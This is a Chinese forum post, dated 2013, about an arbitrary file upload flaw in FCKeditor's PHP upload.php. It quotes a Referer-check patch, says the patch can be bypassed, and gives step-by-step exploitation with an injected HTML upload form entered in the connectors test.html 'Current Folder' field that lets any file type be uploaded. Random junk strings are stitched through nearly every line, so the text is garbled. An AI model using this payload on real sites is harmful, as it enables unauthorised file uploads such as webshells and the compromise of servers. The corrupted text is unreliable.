漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
; y# L6 X/ R& B$ }网上给出的修复方案是8 R, V; x( B7 A5 x- {: `$ r. l. P) x
修复方法,删除FCK编辑器用其他的编辑器
m8 f8 c' n; r& q, @2 v# C. x或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
: u* i9 r* W) s在
# A, h. z' ?3 |; K+ L. l# o8 X& C$ Srequire(‘config.php’);$ K! U* y* h8 B$ J; _
require(‘util.php’);
( _- M8 ~7 H3 m的下面添加以下代码—————————–
5 B6 `0 S& }4 ]9 _/ {" D//防止外部提交
+ i5 y0 k- F: T" @! j0 ~$ y$ Efunction outsidepost()
% M! H2 k4 m0 z5 U* X. e% \{
C0 d- ~- Y& y5 O$servername=$_SERVER['SERVER_NAME'];
* ?' b! H; U) j$sub_from=@$_SERVER['HTTP_REFERER'];4 W# x& `4 C9 Q" Y2 J% s
$sub_len=strlen($servername);
' s' p9 r1 B5 j( l9 K& }+ |$checkfrom=substr($sub_from,7,$sub_len);
) A! b8 h5 Q. Q; T. @3 n9 V+ a8 j Zif($checkfrom!=$servername){( d8 ^ s/ [' }6 Y1 D6 \
echo(“you don’t outsidepost!”);% z. M: O; h+ `/ P9 t C3 N- I
exit;! V: N, ~" B2 i) U' n% O
}
( B9 F" l5 r) R" a( d: N) v}0 }; m. F8 P8 ~+ t
outsidepost();
$ M9 H% x' {3 t& @+ D3 k# J4 f% N& o防止外部提交,但是没有防止内部提交,) Y. o# Z- i% a! g% g) g. q) R( d
利用方法:4 Q% x H% q; T7 {4 O
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
8 {4 D% Z. @. _; Z7 n. w& Q9 f6 ]2,在Current Folder 框输入5 {/ a; `2 t- t. S4 U1 i7 _6 J
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>+ w6 Z0 E5 X8 N% t+ h) d! t
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
7 X; j; W/ d* P4 ?PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对